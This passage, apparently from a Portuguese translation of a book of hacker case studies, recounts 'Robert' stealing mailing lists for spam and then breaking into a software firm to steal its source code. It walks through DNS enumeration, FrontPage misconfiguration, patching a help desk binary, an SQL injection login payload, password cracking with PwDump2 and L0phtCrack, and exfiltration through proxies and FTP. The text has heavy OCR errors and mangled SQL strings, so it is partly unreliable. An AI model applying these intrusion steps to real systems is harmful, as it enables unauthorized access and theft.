Robert sentou-se para estudar o código-fonte da Lista de Assinantes e depois de muito tempo descobriu 
uma oportunidade. A explicaęao tecnica e complicada (veja "Insight", no finał do capitulo). 

Do mesmo modo que o cracker da historia anterior usou o simbolo '&' para enganar um programa, a firn 
de que ele executasse seus comandos, Robert usou uma falha em 'setup.pl. Esse atalho, chamado Talha de 
injeęao variavel backticked', baseia-se no programa instalador lightweight (leve), o setup.pl script, que nao 
valida adequadamente os dados passados para ela. (A diferenęa esta no sistema operacional. O metodo de 
Erik funciona com o Windows; o de Robert, com o Linux,) Um atacante malicioso pode enviar uma serie de 
dados que corrompa um valor armazenado numa variavel de tal modo que o script seja enganado para criar 
outro script Perl usado para executar comandos arbitrarios. Graęas a esse descuido do programador, um 
atacante poderia injetar comandos shell 

O metodo engana o setup.pl fazendo-o pensar que o atacante acabou de instalar a Lista de Assinantes e 
realizar o setup inicial, Robert seria capaz de usar esse truque em qualquer empresa que executasse a versao 
vulneravel do software, Como ele encontrou uma empresa de bondage que se encaixava na descrięao? 
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O código dele, diz Robert, e "de esgotar a mente, de fato complicado para escrever". Quando o script 
dele tivesse terminado, ele se organizaria e entao estabeleceria todas as variaveis de configuraęao de novo, 
de modo que ninguem poderia dizer que aconteceu alguma coisa. "E, ate onde sei, ninguem pegou isso." 

Nenhum hacker consciente enviaria esses arquivos diretamente para seu endereęo de um modo que 
pudesse ser rastreado. 

Eu realmente sou um grandę fa da Web. Adoro a Web, Ela e anonima. Voce pode ir a um 
cibercafe sem ninguem saber quem voce e. Meu materiał ja rodou pelo mundo algumas vezes e 
nao por conexoes diretas. E mais dificil rastrear, e havera apenas talvez urna ou duas linhas no 
arquivo log [da empresa]. 


Lucros do porno 

Robert tinha descoberto que muitos dos sites de bondage usam o mesmo software de mailing list. Com o 
programa modificado, ele visitou esses sites e pegou seus mailing lists, que encaminhou a seu amigo, o 
spammer. Robert queria deixar claro que "eu nao estava fazendo spam diretamente". 

A campanha funcionou incrivelmente. Ao fazer o spam direto para pessoas que sabiam "realmente 
gostarem dessa porcaria" (para usar a firase de Robert), o indice de resposta quebrou todos os recordes, 

Voce geralmente tem [um indice de resposta de] 0,1 e 0,2 por cento, [Estavamos] 
tendo 30 por cento, pelo menos, graęas ao direcionamento- Cerca de 30 a 40 por 
cento das pessoas comprariam. Para uma taxa de spamming, isso e absolutamente 
fenomenal. 

No total, devo ter trazido cerca de 45, 50 mil dólares, e recebi um teręo disso. 

Por tras do sucesso dessa historia sórdida esta o sucesso do esforęo de Robert em reunir os mailing lists 
de pessoas dispostas a desembolsar dinheiro por esse tipo de materiał. Se os numeros que ele nos relatou sao 
exatos, essa e uma medida triste do mundo em que vivemos. 

"Recebi", disse ele, "entre dez e quinze milhdes de nomes." 

Robert, o homem 

Apesar daquele episódio, Robert insiste que "nao sou um spammer sórdido, horroroso; sou uma pessoa 
muito correta". O resto da historia dele confirma essa afirmaęao. Ele trabalha em seguranęa para uma 
"empresa muito religiosa e correta" e executa projetos extemos como consultor autónomo de seguranęa. E 
autor de um livro sobre assuntos de seguranęa. 

Eu o achei extremamente franco na maneira como expressou suas atitudes em relaęao ao hacking: 

Eu realmente gosto de ser desafiado por um sistema e gosto de combate-lo em nivel 
configuracional e social, e nao em nivel estritamente tecnico — nivel social significa entrar na 
[cabeęa da] pessoa que esta por tras do computador. 
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Robert tem uma longa experiencia em hacking. Mencionou um amigo (um hacker norte-americano cujo 
nome nao quis que fosse revelado) que costumava fazer um jogo com ele. 

Ambos costumayamos [entrar em] muitas empresas de desenvolvimento como pessoas que 
estayam criando controles Active X e Delphi e peąuenas ferramentas legais para programaęao. 
Encontrayamos uma revista sobre o assunto e olhayamos os anuncios em todas as paginas sobre 
esses novos produtos. E yiamos se conseguiamos encontrar alguem que nao tinhamos inyadido. 
Principalmente games. 

Ele tem 'passeado' por redes intemas de importantes empresas de software de games e obtido o código- 
fonte de alguns deles. 

Eventualmente, ele e seu colega hacker comeęaram a achar que "entramos praticamente em todos os que 
estayam anunciando cada produto novo la. Fizemos este, este, este... Ainda estamos tentando entrar neste 
aqui, mas conseguimos este." 

Para Robert, uma area tinha interesse especial: produtos de software para o que e chamado Vldeo pós- 
produęao' — em especial os produtos usados para criar a animaęao usada em filmes. 

Adoro a confusao que envolve o que essas pessoas fazem, Ha alguns genios que fazem isso. 
Gosto de ler sobre o assunto e saber como funciona, porque parece muito estranho quando voce 
olha para isso. Quero dizer que, quando voce ve as animaęoes na TV, provavelmente pense: 
"Que coisa, isso realmente vale a pena". 

O que ele acha especialmente intrigante e olhar o código num nivel puramente matematico: "As equaę5es, as 
funęoes e o pensamento por tras das pessoas que criam essas coisas. E fenomenal'. Tudo isso preparou Robert 
para o que considera seu hack mais memoravel. 

Tentaęao de software 

Em 2003, Robert estava lendo um anuncio em uma revista de software e encontrou um novo produto 
para obter "efeitos digitais em video, uma coisa legał de iluminaęao — fazendo a luz parecer real, com 
texturas [que] eram surpreendentemente suaves". 

O poderoso argumento de venda desse produto era que ele tinha sido usado recentemente numa 
importante animaęao — aquela de ferramentas para desenhar, modelar e reproduzir. 

Quando eu soube disso, parecia realmente legał- E pessoas dos circulos com quem estive, como 
na rede, tinham demonstrado extremo interesse pelo software. Muitas pessoas queriam pór as 
mii os nele. 

Todos querem ter esse aplicatiyo porque e dificil de conseguir, e realmente caro — talvez 
duzentos ou trezentos mil dólares. Ele e usado por empresas como a Industrial Light and 
Magie, e talvez haja apenas quatro ou cinco outras empresas no mundo que o tenham 
comprado. 
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De qualquer modo, eu estava realmente interessado em obter esse software e comecei a 
investigar a empresa. Vou chama-la de Empresa X. Tudo bem? A Empresa X estava toda 
instalada nos Estados Unidos e sua rede inteira era centralizada. 

O objetivo dele nao era apenas obter o software para si mesmo, mas disponibiliza-lo a milhoes de 
usuarios da Internet no mundo. 

Ele descobriu que a empresa tinha 'urn firewall logo de cara, e urna peąuena rede, bem apertada. Eles 
possuiam muitos servidores, e varios servidores da Web. A partir disso, deduzi que provavelmente tivessem 
100, 150 funcionarios", 

Descobrindo nomes de servidores 

Robert tern urna estrategia-padrao quando esta tentando invadir urna rede corporativa de tamanho 
significativo. "Procuro saber como eles dao instruęoes aos funcionarios para que entrem na rede. Esse 
desafio e muito maior para urna grandę empresa do que para urna pequena. Se voce tern cinco funcionarios, 
pode enviar um e-mail para eles, certo? Ou pode ver todos eles e dizer: 'E assim que voce se liga a seu 
servidor de casa, e assim que voce recebe seu e-mail de casa'," 

Mas urna grandę empresa em geral tern um help desk ou algum recurso extemo a que as pessoas podem 
recorrer quando ha problema com o computador. Robert imagina que urna empresa com um numero 
significativo de funcionarios tenha um conjunto de instruęoes em algum lugar — mais provavelmente no seu 
help desk — explicando como acessar arquivos e e-mails a distancia. Se ele pudesse encontrar essas 
instruęoes, com certeza poderia aprender os passos para entrar na rede de fora e tambem que software seria 
necessario para se conectar a rede interna pela VPN corporativa. Em especial, esperava descobrir que pontos 
de acesso os desenvolvedores usaram para acessar o sis-tema de desenvolvimento de fora, porque assim 
teriam acesso ao código-fonte tao cobięado. 

Logo, o desafio dele nessa fasę foi encontrar o help desk. 

Comecei a usar um pequeno utilitario chamado Network Mapper, urna coisa que eu mesmo 
escrevi. Basicamente, ele passa por uma lista de nomes de host tlpicos. Eu o uso como 
solucionador DNS seqiiencial. 

O Network Mapper identifica hosts e fomece o endereęo IP para cada um. O breve script Perl de Robert 
baixou uma lista de hostnames usados comumente e yerificou se ele existia com o dominio da empresa-alvo. 
Logo, para um ataque a uma empresa chamada 'digitaltoes', o script poderia procurar web.digitaltoes.com, 
maildigitaltoes.com e assim por diante. Esse exercicio podia descobrir endereęos IP omitidos ou blocos de 
rede que nao eram facilmente identificados. Ao executar o script, ele poderia recuperar resultados parecidos 
com o seguinte: 

beta.digitaltoes.com 
IP Address #1:63.149.163.41... 
ftp.diqitaltoes.com 
IP Address #1:63.149.163.36... 
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intranet.digitaltoes.com 
IP Address #1:65.115.201.138... 
mail. digital toes. com 
IP Address #1:63.149.163.42... 
www.digitaltoes.ccm 
IP Address #1:63.149.163.36... 

isso revelaria que nossa empresa ficticia, 'digitaltoes', tern alguns servidores no bloco de rede 63-149, mas eu 
colocaria meu dinheiro no senddor no bloco de rede 65.115 com o nome 'intranet', como se fosse sua rede interna. 

Urna pequena ajuda do helpdesk.exe 

Entre os servidores que Robert descobriu com seu Network Mapper estava aquele que esperava encontrar: o 
helpdesk.companyX.com . Quando tentou entrar no site, no entanto, urna caixa de dialogo login apareceu exigindo um 
nome de usuario e senha* restringindo acesso a usuarios autorizados. 

O aplicativo helpdesk estava num seryidor que executava IIS4, urna versao antiga do software Internet 
Information Seryer (IIS) da Microsoft, que, como Robert sabia, tinha varias yulnerabilidades. Com um pouco de 
sorte, ele poderia achar um util que nao tivesse recebido um patch. 

Enquanto isso, tambem descobriu um furo. Algum administrador da empresa tinha atiyado a MS FrontPage de tal 
modo que qualquer um poderia fazer o upload ou o download de arquivos do diretório root onde os arquivos do 
seryidor Web estavam armazenados. 

(Conheęo o problema. Um dos seryidores Web em minha nova empresa de seguranęa sofreu um hack que se 
utilizou de urna yulnerabilidade semelhante porque o administrador de sistema yoluntario que estava me dando urna 
mao nao configurou de maneira adequada o sistema. Felizmente, o seryidor era um sistema isolado em seu próprio 
segmento de rede.) 

Reconhecendo que esse erro lhe permitia fazer o download e o upload de arquivos ao seryidor, ele comeęou a 
examinar como o seryidor foi instalado. 

O encadeamento mais comum com alguns seryidores IIS burros e que [aąuele que o instalou] ativou a 

autoria do FrontPage. 

E, de fato, esse site tinha um ponto fraco. Empregar o Microsoft FrontPage (um programa de aplicaęao usado 
para criar e editar facilmente documentos HTML) sem estabelecer as permissoes de arquivo adequadas as vezes e um 
descuido de um administrador de sistema, ou entao ele pode estar intencionalmente configurado desse modo por 
conyeniencia. Nesse caso, isso significava que qualquer um poderia nao só ler arquivos, mas tambem fazer o upload 
deles a qualquer diretório nao protegido. Robert ficou eufórico. 

Eu estava procurando isso e pensando; "Caramba, posso ler ou editar qualquer pagina no seryidor sem 

precisar de um nome de usuario ou senha". Entao, consegui fazer o login e olhar no root do seryidor 

Web. 
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Robert acha que a maioria dos hackers perde uma oportunidade aqui. 

O que acontece e que, quando as pessoas instalam uma rede de scanner para um servidor, 
freqiientemente nao procuram falhas comuns na configuraęao de extensoes do servidor, como o 
FrontPage. Elas olham [para ver que tipo de seryidor e] e dizem: "Bem, e só Apache" ou "E só 
IIS". E deixam de tornar seu trabalho bem mais facil, se o FrontPage foi mai configurado. 

Nao era uma sorte tao grandę, como ele esperava, visto que "nao havia realmente grandę coisa naquele 
seryidor". No entanto, Robert notou que um aplicativo chamado helpdesk.exe aparecia quando ele acessava 
o site por seu browser. Aquilo poderia vir a ser bastante util, mas exigia um login com senha. 

Entao, fiquei olhando para ele, pensando como poderia ataca-lo. Uma coisa que nao gosto de 
fazer e o upload de algum outro arquivo a um seryidor Web, porque se os administradores 
olham seus logs Web e veem mil pessoas indo ao helpdesk.exe e de repente um cara no Pacifico 
Sul indo ao two.exe ou coisa do genero, isso os faria pensar duas vezes, certo? Por isso tento 
ficar fora dos logs. 

O aplicativo help desk consistia de um unico executavel e de um arquivo dynamic-link library (DLL) 
(arquivos com extensao -DLL contem um conjunto de funęoes Windows que o aplicativo pode chamar). 

Conseguindo fazer o upload de arquivos ao Web root, um atacante poderia com facilidade fazer o upload 
de um script simples que lhe permitisse executar comandos atraves de seu browser. Mas Robert nao e um 
atacante qualquer. Ele se orgulha de saber se safar deixando poucos yestigios — se deixar — nos logs do 
seryidor Web. Em vez de apenas fazer o upload de um script personalizado, ele fez o download dos arquivos 
helpdesk.exe e helpdesk.dll ao seu computador para analisar como o aplicativo funcionava, contando com 
sua experiencia anterior. "Fiz muitos aplicativos de engenharia inversa e examinei coisas no montador", de 
modo que ele sabia como trabalhar com o código C compilado e reverter a maior parte dele para o montador. 

O programa a que Robert recorreu era chamado IDA Pro, o Interactive Disassembler (yendido pela 
www.ccso.com L usado, como ele descreve, "por muitas empresas de virus e caęadores de worms, procurando 
descompilar alguma coisa em um nivel de montador e le-la e imaginar o que esta fazendo". Ele descompilou 
ao helpdesk.exe e, sendo um trabalho desempenhado por programadores profissionais, considerou-o "muito 
bem escrito". 

Da mała de truques do hacker: o ataque de 'injeęao SQL' 

Depois de descompilar o programa, Robert examinou o código para ver se o aplicativo help desk era 
suscetivel a 'injeęao SQL, um metodo de ataque que explora um descuido de programaęao comum. Um 
programador preocupado com a seguranęa vai esclarecer qualquer duvida do usuario, incluindo códigos que, 
entre outras coisas, filtram certos caracteres especiais, como o apostrofo, os 
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dois-pontos e os simbolos 'maior que' e 'menor que. Sem filtrar caracteres como esses, a porta pode ser 
deixada aberta para um usuario malicioso enganar o aplicativo, de modo que ele execute solicitaęoes de 
bancos de dados manipulados que possam comprometer um sistema inteiro. 

de fato, Robert percebeu que o aplicativo help desk tinha feito as yerificaęoes adequadas de limpeza para 
impedir que alguem usasse injeęao SQL A maioria dos hackers teria apenas feito o upload de um script ASP 
para o servidor Web e o concluiria, mas Robert estava mais preocupado em nao ser descoberto do que em 
explorar urna simples yulnerabilidade para comprometer seus alvos. 

Pensei: M isso e engraęado, e muito legał. Vou gostar disso". 

Pensei comigo: "Bem, vou ativar a injeęao SQL destruindo a verificaęao de validade". 

Encontrei a serie onde os caracteres invalidos eram guardados e mudei todos para o que acho 

que era um espaęo ou um til ( ~ ) ou alguma coisa que eu nao estava usando, mas ao mesmo 

tempo nao afetaria mais ninguem. 

Em outras palavras, ele modificou o programa (usando um editor hex para ’quebrar" a rotina pianejada 
para verificar a entrada do usuario) de modo que os caracteres especiais nao fossem mais rejeitados. Dessa 
maneira, poderia efetuar secretamente a injeęao SQL sem mudar o comportamento do aplicativo para 
qualquer outra pessoa. Outro bonus adicionado foi que os administradores provavelmente nao verificariam a 
integridade do aplicativo help desk, visto que nao haveria sinais óbvios de que ele tinha sido manipulado. 

Robert entao enviou sua versao modificada do aplicativo de help desk ao servidor Web, substituindo a 
yersao original. Da mesma maneira como algumas pessoas colecionam selos, cartoes-postais ou caixas de 
fósforos de lugares que visitaram, os hackers as vezes guardam nao só os espólios de suas inyasoes, mas 
tambem o código que usaram. Robert ainda tern urna cópia binaria compilada do executavel que ele criou. 

Como estava trabalhando em casa (corajoso, mas isso nao e recomendado, a nao ser que voce queira ser 
pego), ele fez o upload de sua yersao 'nova e aprimorada do aplicativo help desk atraves de urna cadeia de 
seryidores proxy — os seryidores que agem como mediadores entre o computador de um usuario e um 
computador que ele quer acessar. Se um usuario faz urna solicitaęao para um recurso do computador A, ela e 
encaminhada ao seryidor proxy, o qual realiza a solicitaęao, obtem a resposta do computador A e entao a 
encaminha ao cliente. 

Os seryidores proxy costumam ser usados para acessar os recursos da World Wide Web de dentro de um 
firewall. Robert aumentou sua seguranęa usando varios seryidores proxy localizados em diferentes partes do 
mundo para reduzir a probabilidade de ser identificado. Os chamados 'proxies abertos' costumam ser usados 
assim para mascarar a origem de um ciberataque. 

Com sua yersao modificada do aplicatiyo help desk instalada e funcionando, Robert conectou-se ao site- 
alvo usando seu browser da Internet. Quando viu um formulario que solicitava o nome do usuario e a senha, 
lanęou um ataque basico de injeęao SQL, conforme tinha planejado. Em circunstancias normais, urna vez que 
um usuario entra com o nome do usuario e a senha — diga-mos, 'davids' e 'zl8M296q' —, o aplicatiyo usa 
essas entradas para gerar urna sentenęa SQL como a seguinte: 
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select record from users where user = 'davids' and password - l z18M296q < 

Se os campos 'usuario' e 'senha' correspondem as entradas do banco de dados, entao e efetuado O login 
do usuario. E assim que deve funcionar. O ataąue de injeęao SQL de Robert foi o seguinte: no campo do 
nome do usuario, ele entrou com 

‘or where password lik e' % - - 

Para a senha, ele entrou com a sentenęa identica 

‘or where password like ' % - - 

O aplicativo usou essas entradas para gerar uma sentenęa SQL parecida com a seguinte: 

select record from users where user = ' ' or where password 

like ''%' and password = ' ' or where password like '%' 


O elemento or where password like '%' diz ao SQL para retomar o registro se a senha e qualquer coisa 
(o '%' e um coringa). Ao descobrir que a senha encontrou seu requisito sem sentido, o aplicativo aceitou 
Robert como usuario legitimo, como se ele tivesse inserido credenciais autenticas do usuario. Entao, ele o 
conectou com as credenciais da primeira pessoa listada no banco de dados do usuario, geralmente um 
administrador. Foi isso o que aconteceu. Robert descobriu nao só que tinha feito o login, mas tambem que 
possuia priyilegios de administrador. 

Depois disso, pode ver a mensagem que um funcionario autorizado ou outro ve depois de ter efetuado o 
login com sucesso, A partir de uma serie dessas mensagens, Robert acumulou informaęoes nos numeros de 
discagem para ligar para a rede e, em particular, hyperlinks para adicionar e remover usuarios do grupo VPN 
sob Windows. A empresa estava usando seryięos VPN da Microsoft, que sao configurados para que os 
funcionarios usem seu nome de conta e senha Windows para fazer o sign in. E, uma vez que Robert tinha 
feito o login ao aplicativo de help desk como um dos administradores, isso o habilitou a adicionar usuarios ao 
grupo VPN e mudar as senhas do usuario para as contas Windows. 

Fez progresso. No entanto, ate aqui, embora tivesse feito o login a um aplicativo como um ad¬ 
ministrador, isso nao o aproximou de seu código-fonte. O objetivo seguinte era ganhar acesso a rede interna 
deles por meio da instalaęao VPN. 

Só como teste, pelo menu de help desk ele tentou mudar a senha do que parecia ser uma conta inatiya e 
adicionou-a aos usuarios VPN e ao grupo do administrador— o que significava que seria menos provavel 
que as atiyidades dele fossem notadas. Robert imaginou alguns detalhes de sua configuraęao VPN, por isso 
pode "'entrar' na sua VPN. isso e bom, mas funciona um pouco devagar". 

Entrei cerca de uma hora da manha, horario deles. Como eu estava no fuso horario da Australia, 

isso era muito bom. Pode ser uma da madrugada nos Estados Unidos, mas 
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e horario do expediente de trabalho aqui. Eu ąueria entrar quando tiyesse certeza de que a rede 
estaria vazia, nao queria ninguem conectado ou que as pessoas notassem isso. Talvez eles tenham 
reporting ativo de todos aqueles que estao entrando. Eu só queria ter certeza. 

Robert acha que entende como a TI e o pessoal da seguranęa de rede trabalham, e nao e tao diferente dos outros 
no mundo proflssional. "A unica maneira de eles notarem [minha entrada on-line] teria sido passar pelos logs 
ativamente." O que ele pensa de TI e do pessoal da seguranęa nao e muito lisonjeiro. "As pessoas nao leem os logs 
todas as manhas. Quando voce chega a sua mesa, senta-se, toma um cafe, le uns sites Web de interesse pessoal. Nao 
entra e le os logs e verifica quem mudou suas senhas ontem." 

Urna das coisas que ele tinha notado em seus esforęos de hacking, diz Robert, e que "quando voce muda alguma 
coisa num site, as pessoas ou pegam isso imediatamente ou nunca perceberao. A mu-danęa que fiz para aquele 
aplicativo Web teria sido notada se eles nao estivessem executando alguma coisa como Tripwire", disse ele, 
referindo-se a um aplicativo que verifica a integridade dos programas do sistema e de outros aplicativos fazendo urna 
soma de verificaęao criptografica e comparando-a com urna tabela de valores conhecidos. "Eles teriam notado que o 
executavel tinha mudado." 

A essa altura, ele se sentiu tranquilo, citando o termo agora familiar sobre "seguranęa M&M" — dura por fora, 
mas muito mole e facil de mastigar por dentro. "Ninguem liga realmente se alguem olha sua rede porque voce esta 
dentro das instalaęoes. Urna vez que voce conseguiu violar a seguranęa e penetrar no perimetro, esta em casa." (A 
frase significa que urna vez que o atacante esta dentro e usa recursos como qualquer usuario autorizado, e dificil 
detectar sua atividade nao autorizada.) 

Ele descobriu que a conta que sequestrou (mudou a senha) por meio do aplicativo help desk permitiu-lhe entrar 
na rede pelo servięo Microsoft VPN. O computador dele foi, entao, conectado a rede interna da empresa, como se ele 
estivesse usando um computador plugado fisicamente a rede nas instalaęoes da empresa. 

Ate ai Robert tinha sido cuidadoso para nao fazer nada que criasse entradas de log que um ad-ministrador de 
sistemas consciente pudesse notar e estava navegando livremente. 

Urna vez conectado a rede interna da empresa, Robert mapeou nomes de computador Windows aos seus 
endereęos IP, encontrando maquinas com nomes como FINANCE, BACKUP2, WEB e HELPDESK. Ele mapeou 
outros com nomes de pessoas, aparentemente os computadores de funcionarios. Sobre esse assunto, ele reiterou urna 
questao abordada pelos outros neste livro. 

Quando se tratava de nomes dos servidores, alguem na empresa tinha um senso de humor excentrico e familiar 
em partes da alta tecnologia. A tendencia comeęou na Apple Computer, na epoca de seu crescimento acelerado. Steve 
Jobs, com sua veia criativa e sua abordagem de violar todas as regras, decidiu que as salas de conferencia da empresa 
nao seriam chamadas 212A ou Sala de Conferencia do Sexto Andar, nem nada tao comum ou desinteressante. Em vez 
disso, as salas teriam nomes de personagens de cartum em um edificio, de estrelas de cinema em outro e assim por 
diante. Robert descobriu que a empresa de software havia feito algo parecido com alguns de seus servidores, exceto 
com relaęao ao setor de animaęao — os nomes que eles escolheram incluiam os de famosos personagens de 
animaęao. 
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Nao foi um dos servidores com nome engraęado que o atraiu, no entanto. Foi aąuele chamado 
BACKUP2. Sua busca produziu uma preciosidade: um network share aberto chamado Johnny, onde algum 
funcionario tinha feito backup de muitos de seus arquivos. A pessoa em questao parecia se sentir bem a 
yontade e nao estava muito preocupada com seguranęa. Entre os arquivos no diretório havia uma cópia de 
um arquivo folder pessoal do Outlook com cópias de todos os e-mails salvos. (Um network share refere-se a 
um disco rigido ou a uma parte de um disco que foi configurada intencionalmente para acessar ou dividir 
arquivos com os outros.) 

O perigo de fazer backup de dados 

Um ponto em comum entre todos nos e que, ao fazermos um backup, queremos toma-lo real-mente facil 
para nos mesmos. Se ha espaęo disponivel suficiente, fazemos backup de tudo. E entao nos esquecemos dele. 
O numero de backups que ficam por ai e enorme. As pessoas os acumulam e ninguem pensa em remove-los 
ate que o servidor ou o dispositivo de backup fique sem espaęo. 

"Frequentemente", comenta Robert, "o backup contem informaęoes cruciais, essenciais, surpreendentes, 
as quais ninguem da importancia porque sao backups. Ele realmente e tratado com pouca seguranęa." 
(Durante o periodo em que fui hacker, notei a mesma coisa. Uma empresa chegava a extremos para proteger 
certas dados, mas os backups dos mesmos dados eram considerados sem importancia. Quando era fiigitiyo, 
trabalhei para uma empresa de advocacia que deixava suas fitas de backup em uma caixa fora da sala de 
computadores, que era segura, para serem levadas por uma empresa de armazenagem extema. Qualquer um 
poderia ter roubado as fitas, com poucas chances de ser pego.) No BACKUP2, ele notou uma area partilhada 
onde alguem tinha feito o backup de todos os seus goodies. Imaginou como isso tinha acontecido, e a historia 
parecera muito familiar a muita gente: 

Um dia, aąuele usuario estava com pressa. Ele pensou: "Preciso fazer backup disso". entao fez. 

E tres ou ąuatro meses depois de fazer o backup, ainda estava la. Entao, isso me deu uma noęao 
da rede e de como o administrador trabalhava, porąue nao era uma pessoa que desenvolvia 
software nem alguem que nao tinha acesso, Era alguem que podia criar um network share, mas 
obviamente nao estaya muito preocupado com seguranęa. 

Robert prosseguiu: 

Se ele tivesse obsessao por seguranęa, como eu. teria entrado com uma senha naąuele share e 
talvez tivesse denominado o share de alguma coisa aleatória e o removido depois. 

Ainda melhor, da perspectiya de Robert: "Ele tinha uma cópia de seu Outlook la tambem", com todos os 
endereęos e contatos dele. "Copiei o file archiye", diz Robert. "Recuperei seu arquivo Outlook.pst com todos 
os seus e-mails, 130 ou 140 mega." 

Ele fez o logoff e passou algumas horas lendo os e-mails do cara. Descobriu "anuncios publicos, 
alteraęóes de salario, avaliaęóes de desempenho, tudo sobre o usuario. Descobri muita informaęao 
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sobre ele — era um dos administradores da rede e responsavel por todos os servidores Windows", disse 
Robert. "E consegui descobrir pela caixa dele quem eram os outros administradores e quem tinha muito 
acesso." Conseguiu ainda mais: 

As informaęóes dos e-mails dele eram extremamente uteis. Consegui fazer uma lista de pessoas 
que com certeza teriam acesso ao código-fonte que eu queria. Anotei todos os nomes, todos os 
detalhes que pude obter. Entao fiquei por la e llz uma busca em todo o arquivo de e-mail dele 
para 'senha', e o que encontrei foram alguns registros, um deles com uma empresa de 
equipamentos de rede. 

Ele Unha uma conta no seu lado de suporte usando seu endereęo de e-mail e uma senha. E 
tinha feito isso para dois ou tres fornecedores. Descobri os e-mails que tinham retornado [das 
empresas] dizendo: "Obrigado por registrar sua conta, seu nome de usuario e este, sua senha e 
esta". A senha era "minhasenha" para duas empresas diferentes. 

Entao, só podia ser que fosse a mesma que ele estava usando no trabalho. As pessoas sao preguięosas, 
logo, valeria a pena fazer uma tentativa. 

Boa. A senha funcionou para uma das contas dele no servidor da empresa. Mas nao era a conta do 
administrador do dominio que Robert esperava obter, a qual lhe teria permitido acesso ao banco de dados da 
conta master, que armazena todo nome de usuario e hash de senha do usuario de dominio. Aquele banco de 
dados estava sendo chamado para autenticar os usuarios para todo o dominio. Ele aparentemente tinha um 
unico nome de usuario, mas niveis diferentes de acesso, o que dependia de efetuar o login ao dominio ou a 
maquina local. Robert precisava do acesso ao Administrador de Dominio para acessar os sistemas mais 
sensiveis da empresa, mas o administrador estava usando uma senha diferente para a conta do Administrador 
de Dominio, que Robert nao tinha. "Aquilo realmente me levou a exaustao", ele reclamou. 

Todo o negócio estava comeęando a ficar mais do que um pouco ffustrante. "Mas imaginei que poderia 
eventualmente encontrar a senha dele para a outra conta olhando os outros recursos-" 

Entao a situaęao comeęou a clarear. Ele descobriu que a empresa estava usando um aplicativo de 
gerenciamento de projeto chamado Visual SourceSafe e conseguiu obter acesso ao arquivo extemo da senha, 
que aparentemente podia ser lido por qualquer usuario que tivesse acesso ao sistema. Atacar o arquivo de 
senha com o software de quebra da senha de dominio publico levou "talvez uma semana e meia, duas, e eu 
tinha uma senha diferente para o homem". Ele descobriu uma segunda senha para o administrador que esteve 
"caęando". Hora de uma pequena comemoraęao. Essa senha tambem era usada para a conta de Administrador 
de Dominio, que deu a Robert acesso a todos os outros servidores onde ele queria entrar. 

Observaęoes da senha 

As senhas sao coisas muito intimas, diz Robert, "Voce pode perceber que as empresas sao bastante 
seguras quando dao a todos uma senha pessoal e estrita. Mas tambem e possivel saber quais 
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sao as empresas menos rigorosas ąuando a senha-padrao e um dia da semana, o nome da empresa ou alguma 
coisa igualmente negligente." 

(Robert me disse que, na empresa onde trabalha, a senha de um funcionario e escolhida no dia em que 
ele e admitido. Ao tentar fazer o logon, "voce pode tentar sete vezes antes de o sistema bloquear sua entrada, 
e, e claro, nao e necessario mais do que cinco tentativas" se esta tentando peneirar na conta de alguem.) 

Robert descobriu que muitas das contas na empresa que estava tentando comprometer tinham urna 
senha-padrao como esta: 

companyname-2003 

Ele nao encontrou nada com '2002' ou algo anterior a isso, o que deixou óbvio que elas eram mudadas na 
yespera de Ano-Novo. Gerenciamento de senha genial! 

Ganhando pleno acesso 

Robert sentia que estava se aproximando de seu objetivo. De posse da segunda senha que obteve para o 
administrador cuja identidade eletrónica havia sequestrado, agora tinha acesso a senhas hash de todo o 
dominio. Usou o PwDump2 para extrair os hashes do Primary Domain Controller e o lOphtCrack III para 
yiolar a maioria das senhas. 

(O truque legał mais recente usa tabelas rainbow, que sao tabelas de hashes de senha, e suas senhas 
correspondentes. Um site, http://sarcaprj .wayreth.eu.org/ , tenta violar o hash de senha para voce. Voce só 
submete o LAN Manager e NT hashes e seu endereęo de e-mail. Entao recebe um e-mail de volta com as 
senhas. Robert explicou: "Eles tern certos hashes pre-gerados, baseados nos caracteres usados comumente 
para se construir urna senha, de modo que, em vez de precisar de muita potencia de computaęao, eles tem 18 
ou 20 gigabytes de hashes pre-gerados e as senhas correspondentes. E realmente rapido para um computador 
escanear os hashes pre-computados e encontrar urna correspondencia, perguntando: 'Voce e este? Voce e 
este? Voce e este? OK, voce e este"'. Um ataque da tabela rainbow reduz o tempo de yiolaęao a segundos.) 

Quando o lOphtCrack terminou, Robert tinha as senhas da maioria dos usuarios no dominio. A essa 
altura, com base nas informaęoes nos e-mails que tinha seqiiestrado anteriormente, reuniu urna lista de 
pessoas que haviam trocado mensagens com o administrador de sistemas. Urna delas era um funcionario que 
havia escrito sobre um seryidor que tinha sido inyadido, reclamando: "Nao consigo salvar nenhuma das 
revis5es novas nem desenvolver meu código". Entao, obviamente, ele era um desenvolvedor, e essa era urna 
informaęao yaliosa. Robert procurou entao o nome de usuario e a senha do desenvolvedor. 

Ele discou e acessou com as credenciais do desenvolvedor. "Conectado como se fosse ele, tive pleno 
acesso a tudo." 

"Tudo", nesse caso, significa em particular o código-fonte do produto — "as chaves do reino". E ele tinha 
conseguido. "Eu queria roubar o código-fonte. La estava tudo o que eu queria", relembra, alegre. 
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Enviando o código para casa 

Robert agora tinha visto reluzir o ouro que vinha procurando. Mas ainda tinha de encontrar um modo seguro de 
entrega-lo em sua porta. "Sao arquivos muito pesados", diz. "Acho que toda a arvore-fonte estava por volta de um 
giga, o que eu levaria semanas para conseguir." 

(Pelo menos nao era tao ruim quanto tentar fazer o download de um enorme arquivo comprimido com um baud 
modem de 14,4K, quer foi o que fiz quando copiei centenas de megabytes de código-fonte VMS da Digital 
Equipment Corporation anos antes.) 

Urna vez que o código-fonte era imenso, ele queria urna conexao muito mais rapida para envia-lo- E queria urna 
via de entrega que nao fosse facilmente rastreada de volta ate ele. A conexao rapida nao apresentou muito problema. 
Ele tinha comprometido anteriormente outra empresa nos Estados Unidos que usava o Citrix MetaFrame, outro alvo 
facil na Internet. 

Robert estabeleceu urna conexao VPN na empresa-alvo e mapeou um drive para onde O código-fonte residia. Ele 
simplesmente o copiou. "Usei aquele servidor Citrix para VPN na rede [do software da empresa] novamente e entao 
mapeei para o share. Depois copiei todo o código-fonte, binarios e outros dados para o servidor Citrix, que nao 
precisava ser presenado/ 1 

Para encontrar urna rota para entregar os arquivos com seguranęa, nao rastreavel (ele esperava). usou meu 
mecanismo de busca favorito, o Google, para localizar um servidor FTP anónimo, que permite a qualquer um fazer o 
upload e o download de arquivos para um diretório publica-mente acessivel. Alem disso, estava procurando um 
servidor FTP anónimo que tinha diretórios tambem acessiveis via HTTP (usando um browser da Web)- Robert 
